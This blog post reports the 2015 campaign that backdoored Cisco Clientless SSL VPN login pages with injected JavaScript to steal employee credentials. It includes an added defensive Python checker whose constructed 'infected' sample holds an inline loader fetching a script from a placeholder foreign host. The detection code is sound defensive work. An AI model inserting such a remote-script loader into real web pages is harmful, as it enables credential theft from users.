Hackers Backdooring Cisco WebVPN To Steal Customers’ Passwords

October 9, 2015 12:53 AM

Virtual Private Networks (VPNs), which are widely used by businesses and organisations to give their workers secure remote access, are being abused to steal corporate user credentials.

Researchers from security firm Volexity discovered a new attack campaign that targets a widely used VPN product from Cisco Systems to install backdoors that collect the usernames and passwords employees use to log in to corporate networks.

The product in question is Cisco Systems’ Web-based VPN – Clientless SSL VPN.

Once an employee is authenticated, the Clientless SSL VPN allows them to access internal web resources, browse internal file shares, and launch plug-ins that reach internal systems through telnet, SSH, or similar network protocols.

The backdoor consists of malicious JavaScript that the attackers inject into the VPN login page. Once injected, it is hard to detect because the JavaScript itself is hosted on an external compromised website and is fetched only over HTTPS connections, so the page's own code barely changes and the payload is not visible in cleartext on the wire.
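Because the injected backdoor is JavaScript pulled from a foreign host, one practical check a defender can run is to fetch the appliance's login page and flag any script reference that does not resolve to the appliance itself. The following is an added example written for this article; it is not code from the original post, from Volexity, or from Cisco. The sample pages, the hostname `vpn.example.com` and the placeholder host `cdn.compromised-site.invalid` are constructed for the illustration, and the helper names (`ScriptCollector`, `find_suspicious_scripts`) are the example's own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Absolute http(s) URLs embedded in inline script bodies.
URL_RE = re.compile(r"https?://[^\s\"'<>()]+")


class ScriptCollector(HTMLParser):
    """Collect every <script> element on a page: its src attribute and any inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []        # each entry: {"src": str or None, "body": str}
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts[-1]["body"] = "".join(self._buf).strip()
            self._in_script = False


def _foreign_host(url, vpn_host):
    """True if url is absolute and points at a host other than the VPN appliance."""
    host = urlparse(url).hostname          # None for relative paths such as /logon.js
    return host is not None and host.lower() != vpn_host.lower()


def find_suspicious_scripts(html, vpn_host):
    """Return (kind, url) findings for script code the login page pulls from elsewhere.

    vpn_host is the hostname that served the page. A VPN login page has no reason to
    load JavaScript from any other origin, so every foreign host is reported.
    """
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for script in collector.scripts:
        src = script["src"]
        if src and _foreign_host(src, vpn_host):
            findings.append(("external-script", src))
        # An injected loader can also sit inside an inline block and fetch the real
        # payload at runtime, so scan inline bodies for absolute URLs as well.
        for url in URL_RE.findall(script["body"]):
            if _foreign_host(url, vpn_host):
                findings.append(("inline-remote-url", url))
    return findings


# Constructed sample pages (not real captures). A clean page loads only relative scripts.
CLEAN_PAGE = """<html><head><title>SSL VPN Service</title>
<script src="/logon.js"></script>
<script>document.getElementById('username').focus();</script>
</head><body><form method="post" action="/login">...</form></body></html>"""

# Constructed infected page: one externally sourced script plus an inline loader that
# pulls a second payload from the same foreign host. The hostname is a placeholder.
INFECTED_PAGE = """<html><head><title>SSL VPN Service</title>
<script src="/logon.js"></script>
<script src="https://cdn.compromised-site.invalid/theme.js"></script>
<script>
var s = document.createElement("script");
s.src = "https://cdn.compromised-site.invalid/login.js";
document.head.appendChild(s);
</script>
</head><body><form method="post" action="/login">...</form></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, find_suspicious_scripts(page, "vpn.example.com"))
```

In practice you would feed the function the HTML fetched from the appliance (for example with `curl -k https://vpn.example.com/` from a monitoring host) and compare the result against a known-good copy of the page taken after the last legitimate customisation; any foreign host, and any inline block that differs from the baseline, warrants pulling the appliance's page customisation files and logs for review.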

“Unfortunately, Volexity has found that [many] organizations are silently being victimized through this very login page,” Volexity wrote in a blog post published Wednesday. “This begs the question: How are the attackers managing to pull this off?”

Methods to Install Backdoor

According to researchers, the backdoor is installed through two different entry points:

- An exploit that relies on a critical flaw (CVE-2014-3393) in the Clientless SSL VPN that Cisco patched more than 12 months ago.
- Hackers gaining administrative access to the device and using it to load the malicious code.

Infected Targets

Volexity observed this new campaign successfully infected the following organisations:

- Medical think tank
- Universities, NGOs and academic institutions
- Multinational electronics manufacturers
- Non-governmental organizations

In response to the issue, a Cisco spokesperson released a statement saying that the company is aware of the Volexity report and that it released the patches last year. 

Cisco customers can also protect themselves against such threats by following firewall best practices, the official added.

You can head over to Volexity's official blog post, where the company has provided full technical details about the attack, along with suggestions for detecting and removing the VPN infections.

Be secure…
AncusH S. Gaikwad

Published by ancushgaikwad

#Researcher #Professional Certified Ethical Hacker #Speaker #Blogger #Software Developer #Cyber Forensic Investigator #bug bounty #Robotics & More.
